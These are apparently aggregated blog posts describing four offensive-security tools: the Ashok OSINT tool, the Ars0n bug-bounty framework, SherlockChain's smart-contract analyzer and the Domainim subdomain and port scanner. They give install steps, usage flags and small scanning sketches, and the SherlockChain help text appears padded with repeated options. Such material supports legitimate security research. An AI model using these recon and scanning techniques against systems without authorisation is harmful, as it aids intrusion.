
Ashok - An OSINT Recon Tool, A.K.A. Swiss Army Knife

By: Zion3R


Reconnaissance is the first phase of penetration testing: gathering information about the target before any real attacks are planned. Ashok is an incredibly fast recon tool for penetration testers, designed specifically for the reconnaissance phase. Ashok-v1.1 adds an advanced Google dorker and a Wayback crawling machine.



Main Features

- Wayback Crawler Machine
- Google Dorking without limits
- Github Information Grabbing
- Subdomain Identifier
- Cms/Technology Detector With Custom Headers

Installation

~> git clone https://github.com/ankitdobhal/Ashok
~> cd Ashok
~> python3.7 -m pip install -r requirements.txt

How to use Ashok?

A detailed usage guide is available in the Usage section of the Wiki.

A brief index of options is given below:

Docker

Ashok can be launched using a lightweight Python3.8-Alpine Docker image.

$ docker pull powerexploit/ashok-v1.2
$ docker container run -it powerexploit/ashok-v1.2 --help


    Credits



    Ars0N-Framework - A Modern Framework For Bug Bounty Hunting

    By: Zion3R



    Howdy! My name is Harrison Richardson, or rs0n (arson) when I want to feel cooler than I really am. The code in this repository started as a small collection of scripts to help automate many of the common Bug Bounty hunting processes I found myself repeating. Over time, I built a simple web application with a MongoDB connection to manage my findings and identify valuable data points. After 5 years of Bug Bounty hunting, both part-time and full-time, I'm finally ready to package this collection of tools into a proper framework.


    The Ars0n Framework is designed to provide aspiring Application Security Engineers with all the tools they need to leverage Bug Bounty hunting as a means to learn valuable, real-world AppSec concepts and make πŸ’° doing it! My goal is to lower the barrier of entry for Bug Bounty hunting by providing easy-to-use automation tools in combination with educational content and how-to guides for a wide range of Web-based and Cloud-based vulnerabilities. In combination with my YouTube content, this framework will help aspiring Application Security Engineers to quickly and easily understand real-world security concepts that directly translate to a high paying career in Cyber Security.

    In addition to using this tool for Bug Bounty Hunting, aspiring engineers can also use this Github Repository as a canvas to practice collaborating with other developers! This tool was inspired by Metasploit and designed to be modular in a similar way. Each Script (Ex: wildfire.py or slowburn.py) is basically an algorithm that runs the Modules (Ex: fire-starter.py or fire-scanner.py) in a specific pattern for a desired result. Because of this design, the community is free to build new Scripts to solve a specific use-case or Modules to expand the results of these Scripts. By learning the code in this framework and using Github to contribute your own code, aspiring engineers will continue to learn real-world skills that can be applied on the first day of a Security Engineer I position.

    My hope is that this modular framework will act as a canvas to help share what I've learned over my career to the next generation of Security Engineers! Trust me, we need all the help we can get!!


    Quick Start

    Paste this code block into a clean installation of Kali Linux 2023.4 to download, install, and run the latest stable Alpha version of the framework:

    sudo apt update && sudo apt-get update
    sudo apt -y upgrade && sudo apt-get -y upgrade
    wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
    tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
    rm ars0n-framework-v0.0.2-alpha.tar.gz
    cd ars0n-framework
    ./install.sh

    Download Latest Stable ALPHA Version

    wget https://github.com/R-s0n/ars0n-framework/releases/download/v0.0.2-alpha/ars0n-framework-v0.0.2-alpha.tar.gz
    tar -xzvf ars0n-framework-v0.0.2-alpha.tar.gz
    rm ars0n-framework-v0.0.2-alpha.tar.gz

    Install

    The Ars0n Framework includes a script that installs all the necessary tools, packages, etc. that are needed to run the framework on a clean installation of Kali Linux 2023.4.

    Please note that the only supported installation of this framework is on a clean installation of Kali Linux 2023.4. If you choose to try and run the framework outside of a clean Kali install, I will not be able to help troubleshoot if you have any issues.

    ./install.sh

    This video shows exactly what to expect from a successful installation.

    If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts

    ./install.sh --arm

    You will be prompted to enter various API keys and tokens when the installation begins. Entering these is not required to run the core functionality of the framework. If you do not enter these API keys and tokens at the time of installation, simply hit enter at each of the prompts. The keys can be added later to the ~/.keys directory. More information about how to add these keys manually can be found in the Frequently Asked Questions section of this README.

    Run the Web Application (Client and Server)

    Once the installation is complete, you will be given the option to run the application by entering Y. If you choose not to run the application immediately, or if you need to run the application after a reboot, simply navigate to the root directory and run the run.sh bash script.

    ./run.sh

    If you are using an ARM Processor, you will need to add the --arm flag to all Install/Run scripts

    ./run.sh --arm

    Core Modules

    The Ars0n Framework's Core Modules are used to determine the basic scanning logic. Each script is designed to support a specific recon methodology based on what the user is trying to accomplish.

    Wildfire

    At this time, the Wildfire script is the most widely used Core Module in the Ars0n Framework. The purpose of this module is to allow the user to scan multiple targets that allow for testing on any subdomain discovered by the researcher.

    How it works:

    1. The user adds root domains through the Graphical User Interface (GUI) that they wish to scan for hidden subdomains
    2. Wildfire sorts each of these domains based on the last time they were scanned to ensure the domain with the oldest data is scanned first
    3. Wildfire scans each of the domains using the Sub-Modules based on the flags provided by the user.
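
    The scheduling in step 2 can be pictured with a short sketch. This is an illustration only, not the framework's actual code, and the target record shape (a last_scanned timestamp per domain) is an assumption:

    # Illustrative "scan the oldest data first" scheduling (hypothetical data shape).
    from datetime import datetime

    targets = [
        {"domain": "example.com", "last_scanned": "2024-01-10T08:00:00"},
        {"domain": "example.org", "last_scanned": "2023-12-01T12:30:00"},
        {"domain": "example.net", "last_scanned": None},  # never scanned
    ]

    def scan_priority(target):
        # Never-scanned domains sort first, then the oldest scan date.
        ts = target["last_scanned"]
        return datetime.min if ts is None else datetime.fromisoformat(ts)

    for target in sorted(targets, key=scan_priority):
        print("would scan:", target["domain"])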

    Most Wildfire scans take between 8 and 48 hours to complete against a single domain if all Sub-Modules are being run. Variations in this timing can be caused by a number of factors, including the target application and the machine running the framework.

    Also, please note that most data will not show in the GUI until the scan has completed. It's best to run the scan overnight or over a weekend, depending on the number of domains being scanned, and return once the scan has completed to move from Recon to Enumeration.

    Running Wildfire:

    Graphical User Interface (GUI)

    Wildfire can be run from the GUI using the Wildfire button on the dashboard. Once clicked, the front-end will use the checkboxes on the screen to determine what flags should be passed to the scanner.

    Please note that running scans from the GUI still has a few bugs and edge cases that haven't been sorted out. If you have any issues, you can simply run the scan from the CLI.

    Command Line Interface (CLI)

    All Core Modules for The Ars0n Framework are stored in the /toolkit directory. Simply navigate to the directory and run wildfire.py with the necessary flags. At least one Sub-Module flag must be provided.

    python3 wildfire.py --start --cloud --scan

    Slowburn

    Unlike the Wildfire module, which requires the user to identify target domains to scan, the Slowburn module does that work for you. By communicating with APIs for various bug bounty hunting platforms, this script will identify all domains that allow for testing on any discovered subdomain. Once the data has been populated, Slowburn will randomly choose one domain at a time to scan in the same way Wildfire does.

    Please note that the Slowburn module is still in development and is not considered part of the stable alpha release. There will likely be bugs and edge cases encountered by the user.

    In order for Slowburn to identify targets to scan, it must first be initialized. This initialization step collects the necessary data from various APIs and deposits it into a JSON file stored locally. Once this initialization step is complete, Slowburn will automatically begin selecting and scanning one target at a time.

    To initialize Slowburn, simply run the following command:

    python3 slowburn.py --initialize

    Once the data has been collected, it is up to the user whether they want to re-initialize the tool upon the next scan.

    Remember that the scope and targets on public bug bounty programs can change frequently. If you choose to run Slowburn without initializing the data, you may be scanning domains that are no longer in scope for the program. It is strongly recommended that Slowburn be re-initialized each time before running.

    If you choose not to re-initialize the target data, you can run Slowburn using the previously collected data with the following command:

    python3 slowburn.py
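
    The selection behavior described above can be sketched as follows. This is a conceptual illustration, not slowburn.py itself; the file name and JSON shape are assumptions:

    # Conceptual Slowburn-style target selection (file name and JSON shape are assumptions).
    import json
    import random

    def pick_next_target(path="bounty_targets.json"):
        with open(path) as f:
            targets = json.load(f)  # assumed: a list of in-scope root domains
        return random.choice(targets)

    if __name__ == "__main__":
        print("next target:", pick_next_target())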

    Sub-Modules

    The Ars0n Framework's Sub-Modules are designed to be leveraged by the Core Modules to divide the Recon & Enumeration phases into specific tasks. The data collected in each Sub-Module is used by the others to expand your picture of the target's attack surface.

    Fire-Starter

    Fire-Starter is the first step to performing recon against a target domain. The goal of this script is to collect a wealth of information about the attack surface of your target. Once collected, this data will be used by all other Sub-Modules to help the user identify a specific URL that is potentially vulnerable.

    Fire-Starter works by running a series of open-source tools to enumerate hidden subdomains, DNS records, and the ASNs to identify where those external entries are hosted. Currently, Fire-Starter works by chaining together the following widely used open-source tools:

    • Amass
    • Sublist3r
    • Assetfinder
    • Get All URLs (GAU)
    • Certificate Transparency Logs (CRT)
    • Subfinder
    • ShuffleDNS
    • GoSpider
    • Subdomainizer

    These tools cover a wide range of techniques to identify hidden subdomains, including web scraping, brute force, and crawling to identify links and JavaScript URLs.

    Once the scan is complete, the Dashboard will be updated and available to the user.

    Most Sub-Modules in The Ars0n Framework require the data collected from the Fire-Starter module to work. With this in mind, Fire-Starter must be included in the first scan against a target for any usable data to be collected.
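
    The chaining idea above can be sketched in a few lines. This is a generic illustration, not the fire-starter module's code; tool availability and the exact flags passed to subfinder and assetfinder are assumptions:

    # Conceptual sketch of chaining subdomain tools and de-duplicating their output.
    import subprocess

    def run_tool(cmd):
        try:
            out = subprocess.run(cmd, capture_output=True, text=True, timeout=600)
            return {line.strip() for line in out.stdout.splitlines() if line.strip()}
        except (FileNotFoundError, subprocess.TimeoutExpired):
            return set()

    def enumerate_subdomains(domain):
        results = set()
        results |= run_tool(["subfinder", "-d", domain, "-silent"])  # assumed flags
        results |= run_tool(["assetfinder", "--subs-only", domain])  # assumed flags
        return sorted(s for s in results if s.endswith(domain))

    if __name__ == "__main__":
        for sub in enumerate_subdomains("example.com"):
            print(sub)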

    Fire-Cloud

    Coming soon...

    Fire-Scanner

    Fire-Scanner uses the results of Fire-Starter and Fire-Cloud to perform Wide-Band Scanning against all subdomains and cloud services that have been discovered from previous scans.

    At this stage of development, this script leverages Nuclei almost exclusively for all scanning. Instead of simply running the tool, Fire-Scanner breaks the scan down into specific collections of Nuclei Templates and scans them one by one. This strategy helps ensure the scans are stable and produce consistent results, removes any unnecessary or unsafe scan checks, and produces actionable results.
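
    A rough sketch of the "one template collection at a time" strategy is shown below. The collection names and the Nuclei flags used here are assumptions, not Fire-Scanner's actual configuration:

    # Sketch: run Nuclei against one template collection at a time (assumed flags and names).
    import subprocess

    TEMPLATE_COLLECTIONS = ["cves", "exposures", "misconfiguration"]  # hypothetical grouping

    def scan_in_batches(targets_file):
        for collection in TEMPLATE_COLLECTIONS:
            subprocess.run([
                "nuclei",
                "-l", targets_file,           # list of discovered subdomains
                "-t", collection,             # one template collection per run
                "-o", f"results_{collection}.txt",
            ], check=False)

    if __name__ == "__main__":
        scan_in_batches("subdomains.txt")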

    Troubleshooting

    The vast majority of issues installing and/or running the Ars0n Framework are caused by not installing the tool on a clean installation of Kali Linux.

    It is important to remember that, at its core, the Ars0n Framework is a collection of automation scripts designed to run existing open-source tools. Each of these tools has its own way of operating and can experience unexpected behavior if conflicts emerge with any existing service/tool running on the user's system. This complexity is the reason why The Ars0n Framework should only be run on a clean installation of Kali Linux.

    Another very common issue users experience is caused by MongoDB not successfully installing and/or running on their machine. The most common manifestation of this issue is that the user is unable to add an initial FQDN and simply sees a broken GUI. If this occurs, please ensure that your machine has the necessary system requirements to run MongoDB. Unfortunately, there is no current solution if you run into this issue.
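
    One quick way to confirm whether MongoDB is actually reachable is a short connectivity check. The snippet below uses pymongo purely as an illustration; it is not part of the framework:

    # Sanity check that a local MongoDB instance is up (pymongo used only for this check).
    from pymongo import MongoClient
    from pymongo.errors import ServerSelectionTimeoutError

    def mongo_is_running(uri="mongodb://localhost:27017/"):
        try:
            MongoClient(uri, serverSelectionTimeoutMS=2000).server_info()
            return True
        except ServerSelectionTimeoutError:
            return False

    print("MongoDB reachable:", mongo_is_running())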

    Frequently Asked Questions

    Coming soon...



    SherlockChain - A Streamlined AI Analysis Framework For Solidity, Vyper And Plutus Contracts

    By: Zion3R


    SherlockChain is a powerful smart contract analysis framework that combines the capabilities of the renowned Slither tool with advanced AI-powered features. Developed by a team of security experts and AI researchers, SherlockChain offers unparalleled insights and vulnerability detection for Solidity, Vyper and Plutus smart contracts.


    Key Features

    • Comprehensive Vulnerability Detection: SherlockChain's suite of detectors identifies a wide range of vulnerabilities, including high-impact issues like reentrancy, unprotected upgrades, and more.
    • AI-Powered Analysis: Integrated AI models enhance the accuracy and precision of vulnerability detection, providing developers with actionable insights and recommendations.
    • Seamless Integration: SherlockChain seamlessly integrates with popular development frameworks like Hardhat, Foundry, and Brownie, making it easy to incorporate into your existing workflow.
    • Intuitive Reporting: SherlockChain generates detailed reports with clear explanations and code snippets, helping developers quickly understand and address identified issues.
    • Customizable Analyses: The framework's flexible API allows users to write custom analyses and detectors, tailoring the tool to their specific needs.
    • Continuous Monitoring: SherlockChain can be integrated into your CI/CD pipeline, providing ongoing monitoring and alerting for your smart contract codebase.

    Installation

    To install SherlockChain, follow these steps:

    git clone https://github.com/0xQuantumCoder/SherlockChain.git
    cd SherlockChain
    pip install .

    AI-Powered Features

    SherlockChain's AI integration brings several advanced capabilities to the table:

    1. Intelligent Vulnerability Prioritization: AI models analyze the context and potential impact of detected vulnerabilities, providing developers with a prioritized list of issues to address.
    2. Automated Remediation Suggestions: The AI component suggests potential fixes and code modifications to address identified vulnerabilities, accelerating the remediation process.
    3. Proactive Security Auditing: SherlockChain's AI models continuously monitor your codebase, proactively identifying emerging threats and providing early warning signals.
    4. Natural Language Interaction: Users can interact with SherlockChain using natural language, allowing them to query the tool, request specific analyses, and receive detailed responses.

    The --help command in the SherlockChain framework provides a comprehensive overview of all the available options and features. It includes information on:

    1. Vulnerability Detection: The --detect and --exclude-detectors options allow users to specify which vulnerability detectors to run, including both built-in and AI-powered detectors.

    2. Reporting: The --report-format, --report-output, and various --report-* options control how the analysis results are reported, including the ability to generate reports in different formats (JSON, Markdown, SARIF, etc.).
    3. Filtering: The --filter-* options enable users to filter the reported issues based on severity, impact, confidence, and other criteria.
    4. AI Integration: The --ai-* options allow users to configure and control the AI-powered features of SherlockChain, such as prioritizing high-impact vulnerabilities, enabling specific AI detectors, and managing AI model configurations.
    5. Integration with Development Frameworks: Options like --truffle and --truffle-build-directory facilitate the integration of SherlockChain into popular development frameworks like Truffle.
    6. Miscellaneous Options: Additional options for compiling contracts, listing detectors, and customizing the analysis process.

    The --help command provides a detailed explanation of each option, its purpose, and how to use it, making it a valuable resource for users to quickly understand and leverage the full capabilities of the SherlockChain framework.

    Example usage:

    sherlockchain --help

    This will display the comprehensive usage guide for the SherlockChain framework, including all available options and their descriptions.

    usage: sherlockchain [-h] [--version] [--solc-remaps SOLC_REMAPS] [--solc-settings SOLC_SETTINGS]
    [--solc-version SOLC_VERSION] [--truffle] [--truffle-build-directory TRUFFLE_BUILD_DIRECTORY]
    [--truffle-config-file TRUFFLE_CONFIG_FILE] [--compile] [--list-detectors]
    [--list-detectors-info] [--detect DETECTORS] [--exclude-detectors EXCLUDE_DETECTORS]
    [--print-issues] [--json] [--markdown] [--sarif] [--text] [--zip] [--output OUTPUT]
    [--filter-paths FILTER_PATHS] [--filter-paths-exclude FILTER_PATHS_EXCLUDE]
    [--filter-contracts FILTER_CONTRACTS] [--filter-contracts-exclude FILTER_CONTRACTS_EXCLUDE]
    [--filter-severity FILTER_SEVERITY] [--filter-impact FILTER_IMPACT]
    [--filter-confidence FILTER_CONFIDENCE] [--filter-check-suicidal]
    [--filter-check-upgradeable] [--filter-check-erc20] [--filter-check-erc721]
    [--filter-check-reentrancy] [--filter-check-gas-optimization] [--filter-check-code-quality]
    [--filter-check-best-practices] [--filter-check-ai-detectors] [--filter-check-all]
    [--filter-check-none] [--check-all] [--check-suicidal] [--check-upgradeable]
    [--check-erc20] [--check-erc721] [--check-reentrancy] [--check-gas-optimization]
    [--check-code-quality] [--check-best-practices] [--check-ai-detectors] [--check-none]
    [--check-all-detectors] [--check-all-severity] [--check-all-impact] [--check-all-confidence]
    [--check-all-categories] [--check-all-filters] [--check-all-options] [--check-all]
    [--check-none] [--report-format {json,markdown,sarif,text,zip}] [--report-output OUTPUT]
    [--report-severity REPORT_SEVERITY] [--report-impact REPORT_IMPACT]
    [--report-confidence REPORT_CONFIDENCE] [--report-check-suicidal]
    [--report-check-upgradeable] [--report-check-erc20] [--report-check-erc721]
    [--report-check-reentrancy] [--report-check-gas-optimization] [--report-check-code-quality]
    [--report-check-best-practices] [--report-check-ai-detectors] [--report-check-all]
    [--report-check-none] [--report-all] [--report-suicidal] [--report-upgradeable]
    [--report-erc20] [--report-erc721] [--report-reentrancy] [--report-gas-optimization]
    [--report-code-quality] [--report-best-practices] [--report-ai-detectors] [--report-none]
    [--report-all-detectors] [--report-all-severity] [--report-all-impact]
    [--report-all-confidence] [--report-all-categories] [--report-all-filters]
    [--report-all-options] [--report-all] [--report-none] [--ai-enabled] [--ai-disabled]
    [--ai-priority-high] [--ai-priority-medium] [--ai-priority-low] [--ai-priority-all]
    [--ai-priority-none] [--ai-confidence-high] [--ai-confidence-medium] [--ai-confidence-low]
    [--ai-confidence-all] [--ai-confidence-none] [--ai-detectors-all] [--ai-detectors-none]
    [--ai-detectors-specific AI_DETECTORS_SPECIFIC] [--ai-detectors-exclude AI_DETECTORS_EXCLUDE]
    [--ai-models-path AI_MODELS_PATH] [--ai-models-update] [--ai-models-download]
    [--ai-models-list] [--ai-models-info] [--ai-models-version] [--ai-models-check]
    [--ai-models-upgrade] [--ai-models-remove] [--ai-models-clean] [--ai-models-reset]
    [--ai-models-backup] [--ai-models-restore] [--ai-models-export] [--ai-models-import]
    [--ai-models-config AI_MODELS_CONFIG] [--ai-models-config-update] [--ai-models-config-reset]
    [--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-list]
    [--ai-models-config-info] [--ai-models-config-version] [--ai-models-config-check]
    [--ai-models-config-upgrade] [--ai-models-config-remove] [--ai-models-config-clean]
    [--ai-models-config-reset] [--ai-models-config-backup] [--ai-models-config-restore]
    [--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-path AI_MODELS_CONFIG_PATH]
    [--ai-models-config-file AI_MODELS_CONFIG_FILE] [--ai-models-config-url AI_MODELS_CONFIG_URL]
    [--ai-models-config-name AI_MODELS_CONFIG_NAME] [--ai-models-config-description AI_MODELS_CONFIG_DESCRIPTION]
    [--ai-models-config-version-major AI_MODELS_CONFIG_VERSION_MAJOR]
    [--ai-models-config-version-minor AI_MODELS_CONFIG_VERSION_MINOR]
    [--ai-models-config-version-patch AI_MODELS_CONFIG_VERSION_PATCH]
    [--ai-models-config-author AI_MODELS_CONFIG_AUTHOR]
    [--ai-models-config-license AI_MODELS_CONFIG_LICENSE]
    [--ai-models-config-url-documentation AI_MODELS_CONFIG_URL_DOCUMENTATION]
    [--ai-models-config-url-source AI_MODELS_CONFIG_URL_SOURCE]
    [--ai-models-config-url-issues AI_MODELS_CONFIG_URL_ISSUES]
    [--ai-models-config-url-changelog AI_MODELS_CONFIG_URL_CHANGELOG]
    [--ai-models-config-url-support AI_MODELS_CONFIG_URL_SUPPORT]
    [--ai-models-config-url-website AI_MODELS_CONFIG_URL_WEBSITE]
    [--ai-models-config-url-logo AI_MODELS_CONFIG_URL_LOGO]
    [--ai-models-config-url-icon AI_MODELS_CONFIG_URL_ICON]
    [--ai-models-config-url-banner AI_MODELS_CONFIG_URL_BANNER]
    [--ai-models-config-url-screenshot AI_MODELS_CONFIG_URL_SCREENSHOT]
    [--ai-models-config-url-video AI_MODELS_CONFIG_URL_VIDEO]
    [--ai-models-config-url-demo AI_MODELS_CONFIG_URL_DEMO]
    [--ai-models-config-url-documentation-api AI_MODELS_CONFIG_URL_DOCUMENTATION_API]
    [--ai-models-config-url-documentation-user AI_MODELS_CONFIG_URL_DOCUMENTATION_USER]
    [--ai-models-config-url-documentation-developer AI_MODELS_CONFIG_URL_DOCUMENTATION_DEVELOPER]
    [--ai-models-config-url-documentation-faq AI_MODELS_CONFIG_URL_DOCUMENTATION_FAQ]
    [--ai-models-config-url-documentation-tutorial AI_MODELS_CONFIG_URL_DOCUMENTATION_TUTORIAL]
    [--ai-models-config-url-documentation-guide AI_MODELS_CONFIG_URL_DOCUMENTATION_GUIDE]
    [--ai-models-config-url-documentation-whitepaper AI_MODELS_CONFIG_URL_DOCUMENTATION_WHITEPAPER]
    [--ai-models-config-url-documentation-roadmap AI_MODELS_CONFIG_URL_DOCUMENTATION_ROADMAP]
    [--ai-models-config-url-documentation-blog AI_MODELS_CONFIG_URL_DOCUMENTATION_BLOG]
    [--ai-models-config-url-documentation-community AI_MODELS_CONFIG_URL_DOCUMENTATION_COMMUNITY]

    This comprehensive usage guide provides information on all the available options and features of the SherlockChain framework, including:

    • Vulnerability detection options: --detect, --exclude-detectors
    • Reporting options: --report-format, --report-output, --report-*
    • Filtering options: --filter-*
    • AI integration options: --ai-*
    • Integration with development frameworks: --truffle, --truffle-build-directory
    • Miscellaneous options: --compile, --list-detectors, --list-detectors-info

    By reviewing this comprehensive usage guide, you can quickly understand how to leverage the full capabilities of the SherlockChain framework to analyze your smart contracts and identify potential vulnerabilities. This will help you ensure the security and reliability of your DeFi protocol before deployment.
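
    As a quick illustration of driving the CLI from a script, the sketch below uses only flags shown in the usage above (--detect, --report-format, --report-output). The positional contract path and the structure of the JSON report are assumptions:

    # Sketch: invoke the CLI and load its JSON report (invocation shape and report structure assumed).
    import json
    import subprocess

    def analyze(contract_path, report_path="report.json"):
        subprocess.run([
            "sherlockchain", contract_path,
            "--detect", "reentrancy-eth,unprotected-upgrade",
            "--report-format", "json",
            "--report-output", report_path,
        ], check=False)
        with open(report_path) as f:
            return json.load(f)

    if __name__ == "__main__":
        findings = analyze("contracts/MyToken.sol")
        print(json.dumps(findings, indent=2))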

    AI-Powered Detectors

    Num Detector What it Detects Impact Confidence
    1 ai-anomaly-detection Detect anomalous code patterns using advanced AI models High High
    2 ai-vulnerability-prediction Predict potential vulnerabilities using machine learning High High
    3 ai-code-optimization Suggest code optimizations based on AI-driven analysis Medium High
    4 ai-contract-complexity Assess contract complexity and maintainability using AI Medium High
    5 ai-gas-optimization Identify gas-optimizing opportunities with AI Medium Medium

    Detectors

    Num Detector What it Detects Impact Confidence
    1 abiencoderv2-array Storage abiencoderv2 array High High
    2 arbitrary-send-erc20 transferFrom uses arbitrary from High High
    3 array-by-reference Modifying storage array by value High High
    4 encode-packed-collision ABI encodePacked Collision High High
    5 incorrect-shift The order of parameters in a shift instruction is incorrect. High High
    6 multiple-constructors Multiple constructor schemes High High
    7 name-reused Contract's name reused High High
    8 protected-vars Detected unprotected variables High High
    9 public-mappings-nested Public mappings with nested variables High High
    10 rtlo Right-To-Left-Override control character is used High High
    11 shadowing-state State variables shadowing High High
    12 suicidal Functions allowing anyone to destruct the contract High High
    13 uninitialized-state Uninitialized state variables High High
    14 uninitialized-storage Uninitialized storage variables High High
    15 unprotected-upgrade Unprotected upgradeable contract High High
    16 codex Use Codex to find vulnerabilities. High Low
    17 arbitrary-send-erc20-permit transferFrom uses arbitrary from with permit High Medium
    18 arbitrary-send-eth Functions that send Ether to arbitrary destinations High Medium
    19 controlled-array-length Tainted array length assignment High Medium
    20 controlled-delegatecall Controlled delegatecall destination High Medium
    21 delegatecall-loop Payable functions using delegatecall inside a loop High Medium
    22 incorrect-exp Incorrect exponentiation High Medium
    23 incorrect-return If a return is incorrectly used in assembly mode. High Medium
    24 msg-value-loop msg.value inside a loop High Medium
    25 reentrancy-eth Reentrancy vulnerabilities (theft of ethers) High Medium
    26 return-leave If a return is used instead of a leave. High Medium
    27 storage-array Signed storage integer array compiler bug High Medium
    28 unchecked-transfer Unchecked tokens transfer High Medium
    29 weak-prng Weak PRNG High Medium
    30 domain-separator-collision Detects ERC20 tokens that have a function whose signature collides with EIP-2612's DOMAIN_SEPARATOR() Medium High
    31 enum-conversion Detect dangerous enum conversion Medium High
    32 erc20-interface Incorrect ERC20 interfaces Medium High
    33 erc721-interface Incorrect ERC721 interfaces Medium High
    34 incorrect-equality Dangerous strict equalities Medium High
    35 locked-ether Contracts that lock ether Medium High
    36 mapping-deletion Deletion on mapping containing a structure Medium High
    37 shadowing-abstract State variables shadowing from abstract contracts Medium High
    38 tautological-compare Comparing a variable to itself always returns true or false, depending on comparison Medium High
    39 tautology Tautology or contradiction Medium High
    40 write-after-write Unused write Medium High
    41 boolean-cst Misuse of Boolean constant Medium Medium
    42 constant-function-asm Constant functions using assembly code Medium Medium
    43 constant-function-state Constant functions changing the state Medium Medium
    44 divide-before-multiply Imprecise arithmetic operations order Medium Medium
    45 out-of-order-retryable Out-of-order retryable transactions Medium Medium
    46 reentrancy-no-eth Reentrancy vulnerabilities (no theft of ethers) Medium Medium
    47 reused-constructor Reused base constructor Medium Medium
    48 tx-origin Dangerous usage of tx.origin Medium Medium
    49 unchecked-lowlevel Unchecked low-level calls Medium Medium
    50 unchecked-send Unchecked send Medium Medium
    51 uninitialized-local Uninitialized local variables Medium Medium
    52 unused-return Unused return values Medium Medium
    53 incorrect-modifier Modifiers that can return the default value Low High
    54 shadowing-builtin Built-in symbol shadowing Low High
    55 shadowing-local Local variables shadowing Low High
    56 uninitialized-fptr-cst Uninitialized function pointer calls in constructors Low High
    57 variable-scope Local variables used prior their declaration Low High
    58 void-cst Constructor called not implemented Low High
    59 calls-loop Multiple calls in a loop Low Medium
    60 events-access Missing Events Access Control Low Medium
    61 events-maths Missing Events Arithmetic Low Medium
    62 incorrect-unary Dangerous unary expressions Low Medium
    63 missing-zero-check Missing Zero Address Validation Low Medium
    64 reentrancy-benign Benign reentrancy vulnerabilities Low Medium
    65 reentrancy-events Reentrancy vulnerabilities leading to out-of-order Events Low Medium
    66 return-bomb A low level callee may consume all callers gas unexpectedly. Low Medium
    67 timestamp Dangerous usage of block.timestamp Low Medium
    68 assembly Assembly usage Informational High
    69 assert-state-change Assert state change Informational High
    70 boolean-equal Comparison to boolean constant Informational High
    71 cyclomatic-complexity Detects functions with high (> 11) cyclomatic complexity Informational High
    72 deprecated-standards Deprecated Solidity Standards Informational High
    73 erc20-indexed Un-indexed ERC20 event parameters Informational High
    74 function-init-state Function initializing state variables Informational High
    75 incorrect-using-for Detects using-for statement usage when no function from a given library matches a given type Informational High
    76 low-level-calls Low level calls Informational High
    77 missing-inheritance Missing inheritance Informational High
    78 naming-convention Conformity to Solidity naming conventions Informational High
    79 pragma If different pragma directives are used Informational High
    80 redundant-statements Redundant statements Informational High
    81 solc-version Incorrect Solidity version Informational High
    82 unimplemented-functions Unimplemented functions Informational High
    83 unused-import Detects unused imports Informational High
    84 unused-state Unused state variables Informational High
    85 costly-loop Costly operations in a loop Informational Medium
    86 dead-code Functions that are not used Informational Medium
    87 reentrancy-unlimited-gas Reentrancy vulnerabilities through send and transfer Informational Medium
    88 similar-names Variable names are too similar Informational Medium
    89 too-many-digits Conformance to numeric notation best practices Informational Medium
    90 cache-array-length Detects for loops that use length member of some storage array in their loop condition and don't modify it. Optimization High
    91 constable-states State variables that could be declared constant Optimization High
    92 external-function Public function that could be declared external Optimization High
    93 immutable-states State variables that could be declared immutable Optimization High
    94 var-read-using-this Contract reads its own variable using this Optimization High


    Domainim - A Fast And Comprehensive Tool For Organizational Network Scanning

    By: Zion3R


    Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.


    Features

    Current features (v1.0.1):

    • Subdomain enumeration (2 engines + bruteforcing)
    • User-friendly output
    • Resolving A records (IPv4)
    • Virtual hostname enumeration
    • Reverse DNS lookup
    • Detects wildcard subdomains (for bruteforcing)
    • Basic TCP port scanning
    • Subdomains are accepted as input
    • Export results to JSON file

    A few features are work in progress. See Planned features for more details.

    The project is inspired by Sublist3r. The port scanner module is heavily based on NimScan.

    Installation

    You can build this repo from source:

    • Clone the repository

    git clone git@github.com:pptx704/domainim

    • Build the binary

    nimble build

    • Run the binary

    ./domainim <domain> [--ports=<ports>]

    Or, you can just download the binary from the release page. Keep in mind that the binary is tested on Debian based systems only.

    Usage

    ./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | -l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
    • <domain> is the domain to be enumerated. It can be a subdomain as well.
    • --ports | -p is a string specification of the ports to be scanned (a short parsing sketch follows this list). It can be one of the following-
    • all - Scan all ports (1-65535)
    • none - Skip port scanning (default)
    • t<n> - Scan top n ports (same as nmap). i.e. t100 scans top 100 ports. Max value is 5000. If n is greater than 5000, it will be set to 5000.
    • single value - Scan a single port. i.e. 80 scans port 80
    • range value - Scan a range of ports. i.e. 80-100 scans ports 80 to 100
    • comma separated values - Scan multiple ports. i.e. 80,443,8080 scans ports 80, 443 and 8080
    • combination - Scan a combination of the above. i.e. 80,443,8080-8090,t500 scans ports 80, 443, 8080 to 8090 and top 500 ports
    • --dns | -d is the address of the dns server. This should be a valid IPv4 address and can optionally contain the port number-
    • a.b.c.d - Use DNS server at a.b.c.d on port 53
    • a.b.c.d#n - Use DNS server at a.b.c.d on port n
    • --wordlist | -l - Path to the wordlist file. This is used for bruteforcing subdomains. If the file is invalid, bruteforcing will be skipped. You can get a wordlist from SecLists. A wordlist is also provided in the release page.
    • --rps | -r - Number of requests to be made per second during bruteforce. The default value is 1024 req/s. Note that DNS queries are made in batches, and the next batch is made only after the previous one is completed. Since queries can be rate limited, increasing the value does not always guarantee faster results.
    • --out | -o - Path to the output file. The output will be saved in JSON format. The filename must end with .json.
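
    The port specification described above can be illustrated with a small parser. This is my own sketch in Python (Domainim itself is written in Nim), and the t<n> handling simply takes the first n ports as a stand-in for "top n ports":

    # Illustration of expanding a port specification like "80,443,8080-8090,t500".
    def expand_ports(spec, top_ports=None):
        top_ports = top_ports or list(range(1, 5001))  # placeholder for a real top-ports list
        if spec == "all":
            return set(range(1, 65536))
        if spec == "none":
            return set()
        ports = set()
        for part in spec.split(","):
            if part.startswith("t"):
                n = min(int(part[1:]), 5000)     # cap at 5000, as documented
                ports.update(top_ports[:n])
            elif "-" in part:
                lo, hi = part.split("-")
                ports.update(range(int(lo), int(hi) + 1))
            else:
                ports.add(int(part))
        return ports

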